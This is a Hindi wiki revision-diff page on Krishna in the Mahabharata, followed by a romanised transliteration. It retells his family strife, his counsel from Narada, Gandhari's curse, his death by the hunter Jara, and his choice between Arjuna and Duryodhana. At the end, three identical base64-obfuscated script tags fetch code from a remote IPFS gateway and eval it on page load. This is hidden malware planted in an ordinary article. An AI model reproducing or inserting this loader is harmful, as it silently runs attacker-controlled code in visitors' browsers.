Difference between revisions of "कृष्ण और महाभारत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''महाभारत- द्रोणाभिषेकपर्व, आश्वमेधिकपर्व'''<br />
 
'''महाभारत- द्रोणाभिषेकपर्व, आश्वमेधिकपर्व'''<br />
 
[[चित्र:krishna-arjun1.jpg|thumb|250px|[[कृष्ण]] और [[अर्जुन]]<br /> Krishna And Arjuna]]
 
[[चित्र:krishna-arjun1.jpg|thumb|250px|[[कृष्ण]] और [[अर्जुन]]<br /> Krishna And Arjuna]]
श्री[[कृष्ण]] मंझले भाई थे। उनके बड़े भाई का नाम [[बलराम]] था जो अपनी भक्ति में ही मस्त रहते थे। उनसे छोटे का नाम 'गद' था। वे अत्यंत सुकुमार होने के कारण श्रम से दूर भागते थे।  श्रीकृष्ण के बेटे [[प्रद्युम्न]] अपने दैहिक सौंदर्य से मदासक्त थे। कृष्ण अपने राज्य का आधा धन ही लेते थे, शेष यादववंशी उसका उपभोग करते थे। श्रीकृष्ण के जीवन में भी ऐसे क्षण आये जब उन्होंने अपने जीवन का असंतोष [[नारद]] के सम्मुख कह सुनाया और पूछा कि यादववंशी लोगों के परस्पर द्वेष तथा अलगाव के विषय में उन्हें क्या करना चाहिए। नारद ने उन्हें सहनशीलता का उपदेश देकर एकता बनाये रखने को कहा।  
+
[[श्रीकृष्ण]] मंझले भाई थे। उनके बड़े भाई का नाम [[बलराम]] था, जो अपनी भक्ति में ही मस्त रहते थे। उनसे छोटे का नाम 'गद' था। वे अत्यंत सुकुमार होने के कारण श्रम से दूर भागते थे।  श्रीकृष्ण के पुत्र [[प्रद्युम्न]] अपने दैहिक सौंदर्य से मदासक्त थे। अपने राज्य का आधा धन ही कृष्ण लेते थे, शेष धन का उपयोग [[यादव वंश|यादव वंशी]] करते थे। कृष्ण के जीवन में भी कई ऐसे क्षण आये, जब उन्होंने अपने जीवन का असंतोष [[नारद]] के सम्मुख कह सुनाया और पूछा कि- "यादव वंशी लोगों के परस्पर द्वेष तथा अलगाव के विषय में उन्हें क्या करना चाहिए।" नारद ने उन्हें सहनशीलता का उपदेश देकर एकता बनाये रखने को कहा।<ref>महाभारत, द्रोणाभिषेकपर्व, 11, श्लोक 10-11, शांतिपर्व 81, आश्व मेधिकपर्व,52)</ref>
<br />(म0भा0, द्रोणाभिषेकपर्व, 11, श्लोक 10-11, शांतिपर्व 81, आश्व मेधिकपर्व,52)
 
 
==महाभारत- मौसलपर्व / ब्रह्म पुराण==
 
==महाभारत- मौसलपर्व / ब्रह्म पुराण==
[[चित्र:Bhishma1.jpg|महाभारत युद्ध में [[भीष्म]] [[कृष्ण]] की प्रतिज्ञा भंग करवाते हुए|thumb|250px|left]]
+
[[चित्र:Bhishma1.jpg|महाभारत युद्ध में [[भीष्म]] [[कृष्ण]] की प्रतिज्ञा भंग करवाते हुए|thumb|220px|left]]
[[महाभारत]] युद्ध में [[कौरव|कौरवों]] के संहार के उपरांत [[गांधारी]] ने श्रीकृष्ण को समस्त वंश सहित नष्ट होने का शाप दिया था। [[चित्र:Gita-Krishna-1.jpg|150px|thumb|[[कृष्ण]] और [[अर्जुन]]]] युद्ध के 36 वर्ष उपरांत यादववंशियों में अन्याय और कलह अपने चरम पर पहुंच गया। श्रीकृष्ण को बार-बार गांधारी के शाप का स्मरण हो आता।  तभी मौसल युद्ध में समस्त यादव, [[वृष्णि संघ|वृष्णि]] तथा [[अंधक संघ|अंधकवंशी]] लोगों का नाश हो गया। श्रीकृष्ण तपस्या में लगे भाई बलराम के पास तपस्या करने के लिए चले गये। बलराम योगयुक्त समाधिस्थ बैठे थे।  कृष्ण ने देखा कि उनके मुंह से एक श्वेत वर्ण का विशालकाय सर्प निकला जिसके एक सहस्त्र फन थे। वह महासागर की ओर बढ़ गया। सागर में से तक्षक, अरुण, [[कुंजर]] इत्यादि सब ने भगवान अनंत की भांति उसका स्वागत किया। इस प्रकार बलराम का शरीर-त्याग देखकर कृष्ण पुन: गांधारी के शाप तथा [[दुर्वासा]] के शरीर पर जूठी खीर पुतवाने की बात स्मरण करते रहे, फिर मन, वाणी और इन्द्रियों का निरोध करके [[पृथ्वी देवी|पृथ्वी]] पर लेट गये। उसी समय जरा नामक एक भंयकर व्याध मृगों को मारता हुआ वहां पहुंचा। लेटे हुए कृष्ण को मृग समझकर उसने बाण से प्रहार किया जो श्रीकृष्ण को पांव के तलवों में लगा। पास जाकर उसने कृष्ण को पहचाना तथा क्षमा-याचना की कृष्ण उसे आश्वस्त कर ऊर्ध्वलोक में चले गये।<br />
+
[[महाभारत]] के युद्ध में [[कौरव|कौरवों]] के संहार के उपरांत [[गांधारी]] ने श्रीकृष्ण को समस्त वंश सहित नष्ट होने का शाप दिया था।  युद्ध के 36 वर्ष उपरांत यादववंशियों में अन्याय और कलह अपने चरम पर पहुँच गया। श्रीकृष्ण को बार-बार गांधारी के शाप का स्मरण हो आता था। तभी मौसल युद्ध में समस्त यादव, [[वृष्णि संघ|वृष्णि]] तथा [[अंधक संघ|अंधकवंशी]] लोगों का नाश हो गया। श्रीकृष्ण तपस्या में लगे अपने बड़े भाई बलराम के पास तपस्या करने के लिए चले गये। बलराम योगयुक्त समाधिस्थ बैठे थे।  कृष्ण ने देखा कि उनके मुँह से एक श्वेत वर्ण का विशालकाय सर्प निकला, जिसके एक सहस्त्र फन थे। वह [[महासागर]] की ओर बढ़ गया। [[सागर]] में से [[तक्षक नाग|तक्षक]], [[अरुण देवता|अरुण]], [[कुंजर]] इत्यादि सबने भगवान अनंत की भांति उसका स्वागत किया। इस प्रकार बलराम का शरीर-त्याग देखकर कृष्ण पुन: गांधारी के शाप तथा [[दुर्वासा]] के शरीर पर जूठी खीर पुतवाने की बात स्मरण करते रहे।[[चित्र:Gita-Krishna-1.jpg|150px|thumb|[[कृष्ण]] और [[अर्जुन]]]] फिर मन, वाणी और इन्द्रियों का निरोध करके [[पृथ्वी देवी|पृथ्वी]] पर लेट गये। उसी समय 'जरा' नामक एक भंयकर व्याध मृगों को मारता हुआ वहाँ पहुँचा। लेटे हुए कृष्ण को मृग समझकर उसने [[बाण अस्त्र|बाण]] से प्रहार किया, जो [[श्रीकृष्ण]] को पाँव के तलवों में लगा। पास जाकर उसने कृष्ण को पहचाना तथा क्षमा-याचना की कृष्ण उसे आश्वस्त कर ऊर्ध्वलोक में चले गये।<ref>महाभारत, मौसलपर्व, अध्याय 04, ब्रह्मपुराण, 210 से 211 तक)</ref>
(म0भा0, मौसलपर्व, अध्याय 04, ब्र0पु0 , 210 से 211 तक)
+
==महाभारत- उद्योगपर्व==
 +
[[अभिमन्यु]] तथा [[उत्तरा]] के [[विवाह]] के उपरांत उपस्थित मित्र तथा संबंधियों ने मन्त्रणा की कि तेरह वर्ष पूर्ण होने पर भी [[कौरव]] आधा राज्य दे देंगे, ऐसा नहीं प्रतीत होता। अत: एक दूत [[दुर्योधन]] के पास भेजना चाहिए, ताकि उसके विचार पता चलें और दूसरी ओर सेना-संचय का कार्य प्रारंभ करना चाहिए। निश्चय के अनुसार [[अर्जुन]] [[कृष्ण]] के पास युद्ध में सहायता मांगने के लिए पहुँचे। इनसे पूर्व वहाँ दुर्योधन पहले ही पहुँच चुका था। जब अर्जुन और दुर्योधन कृष्ण के पास पहुँचे, तब वे गहरी निद्रा में सो रहे थे। दुर्योधन श्रीकृष्ण के सिरहाने की ओर के आसन पर बैठ गया और अर्जुन पाँव की ओर खड़े रहे। जब कृष्ण जाग कर उठे तो उन्होंने देखा कि अर्जुन और दुर्योधन दोनों ही उनसे युद्ध में सहायता की इच्छा से आये हैं। एक पहले आया था, दूसरा पहले देखा गया था। अत: कृष्ण ने एक को सेना देने का तथा दूसरे को स्वयं बिना हथियार उठाए सहायता करने का निश्चय किया। अर्जुन कृष्ण को पाकर तथा दुर्योंधन सेना पाकर प्रसन्न हो गये।<ref>महाभारत, उद्योगपर्व , अध्याय 1 से 7</ref>
  
==महाभारत- उद्योगपर्व==
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
[[अभिमन्यु]] तथा [[उत्तरा]] के विवाह के उपरांत उपस्थित मित्र तथा संबंधियों ने मन्त्रणा की कि तेरह वर्ष पूर्ण होने पर भी [[कौरव]] आधा राज्य दे देंगे, ऐसा नहीं प्रतीत होता, अत: एक दूत [[दुर्योधन]] के पास भेजना चाहिए ताकि उसके विचार पता चले और दूसरी ओर सेना-संचय प्रारंभ करना चाहिए।  निश्चय के अनुसार [[अर्जुन]] कृष्ण के पास युद्ध में सहायता मांगने के लिए पहुंचा।  इससे पूर्व वहां दुर्योधन पहुंच चुका था। कृष्ण सो रहे थे।  दुर्योधन सिरहाने  की ओर के आसन पर बैठा था- अर्जुन पांव की ओर खड़ा रहा।  कृष्ण ने उठकर पहले अर्जुन को देखा फिर दुर्योधन को दोनों सहायता के लिए आये थे।  एक पहले आया था, दूसरा पहले देखा गया था।  अत: कृष्ण ने एक को सेना देने का तथा दूसरे को स्वयं बिना हथियार उठाए सहायता करने का निश्चय किया।  अर्जुन कृष्ण को पाकर तथा दुर्योंधन सेना पाकर प्रसन्न हो गये।<br />  
+
==टीका टिप्पणी और संदर्भ==
(म0भा0, उद्योगपर्व , अध्याय 1 से 7)
+
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाभारत}}
 
{{महाभारत}}
 
{{कृष्ण2}}
 
{{कृष्ण2}}
 
{{कृष्ण}}
 
{{कृष्ण}}
[[Category:महाभारत]]
+
[[Category:महाभारत]][[Category:कृष्ण काल]][[Category:पौराणिक कोश]]  
[[Category:कृष्ण काल]]
 
[[Category:पौराणिक कोश]]  
 
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 10:17, 29 April 2013

mahabharat- dronabhishekaparv, ashvamedhikaparv
[[chitr:krishna-arjun1.jpg|thumb|250px|krishna aur arjun
Krishna And Arjuna]] shrikrishna manjhale bhaee the. unake b de bhaee ka nam balaram tha, jo apani bhakti mean hi mast rahate the. unase chhote ka nam 'gad' tha. ve atyant sukumar hone ke karan shram se door bhagate the. shrikrishna ke putr pradyumn apane daihik sauandary se madasakt the. apane rajy ka adha dhan hi krishna lete the, shesh dhan ka upayog yadav vanshi karate the. krishna ke jivan mean bhi kee aise kshan aye, jab unhoanne apane jivan ka asantosh narad ke sammukh kah sunaya aur poochha ki- "yadav vanshi logoan ke paraspar dvesh tatha alagav ke vishay mean unhean kya karana chahie." narad ne unhean sahanashilata ka upadesh dekar ekata banaye rakhane ko kaha.[1]

mahabharat- mausalaparv / brahm puran

[[chitr:Bhishma1.jpg|mahabharat yuddh mean bhishm krishna ki pratijna bhang karavate hue|thumb|220px|left]] mahabharat ke yuddh mean kauravoan ke sanhar ke uparaant gaandhari ne shrikrishna ko samast vansh sahit nasht hone ka shap diya tha. yuddh ke 36 varsh uparaant yadavavanshiyoan mean anyay aur kalah apane charam par pahuanch gaya. shrikrishna ko bar-bar gaandhari ke shap ka smaran ho ata tha. tabhi mausal yuddh mean samast yadav, vrishni tatha aandhakavanshi logoan ka nash ho gaya. shrikrishna tapasya mean lage apane b de bhaee balaram ke pas tapasya karane ke lie chale gaye. balaram yogayukt samadhisth baithe the. krishna ne dekha ki unake muanh se ek shvet varn ka vishalakay sarp nikala, jisake ek sahastr phan the. vah mahasagar ki or badh gaya. sagar mean se takshak, arun, kuanjar ityadi sabane bhagavan anant ki bhaanti usaka svagat kiya. is prakar balaram ka sharir-tyag dekhakar krishna pun: gaandhari ke shap tatha durvasa ke sharir par joothi khir putavane ki bat smaran karate rahe.[[chitr:Gita-Krishna-1.jpg|150px|thumb|krishna aur arjun]] phir man, vani aur indriyoan ka nirodh karake prithvi par let gaye. usi samay 'jara' namak ek bhanyakar vyadh mrigoan ko marata hua vahaan pahuancha. lete hue krishna ko mrig samajhakar usane ban se prahar kiya, jo shrikrishna ko paanv ke talavoan mean laga. pas jakar usane krishna ko pahachana tatha kshama-yachana ki krishna use ashvast kar oordhvalok mean chale gaye.[2]

mahabharat- udyogaparv

abhimanyu tatha uttara ke vivah ke uparaant upasthit mitr tatha sanbandhiyoan ne mantrana ki ki terah varsh poorn hone par bhi kaurav adha rajy de deange, aisa nahian pratit hota. at: ek doot duryodhan ke pas bhejana chahie, taki usake vichar pata chalean aur doosari or sena-sanchay ka kary praranbh karana chahie. nishchay ke anusar arjun krishna ke pas yuddh mean sahayata maangane ke lie pahuanche. inase poorv vahaan duryodhan pahale hi pahuanch chuka tha. jab arjun aur duryodhan krishna ke pas pahuanche, tab ve gahari nidra mean so rahe the. duryodhan shrikrishna ke sirahane ki or ke asan par baith gaya aur arjun paanv ki or kh de rahe. jab krishna jag kar uthe to unhoanne dekha ki arjun aur duryodhan donoan hi unase yuddh mean sahayata ki ichchha se aye haian. ek pahale aya tha, doosara pahale dekha gaya tha. at: krishna ne ek ko sena dene ka tatha doosare ko svayan bina hathiyar uthae sahayata karane ka nishchay kiya. arjun krishna ko pakar tatha duryoandhan sena pakar prasann ho gaye.[3]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. mahabharat, dronabhishekaparv, 11, shlok 10-11, shaantiparv 81, ashv medhikaparv,52)
  2. mahabharat, mausalaparv, adhyay 04, brahmapuran, 210 se 211 tak)
  3. mahabharat, udyogaparv , adhyay 1 se 7

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>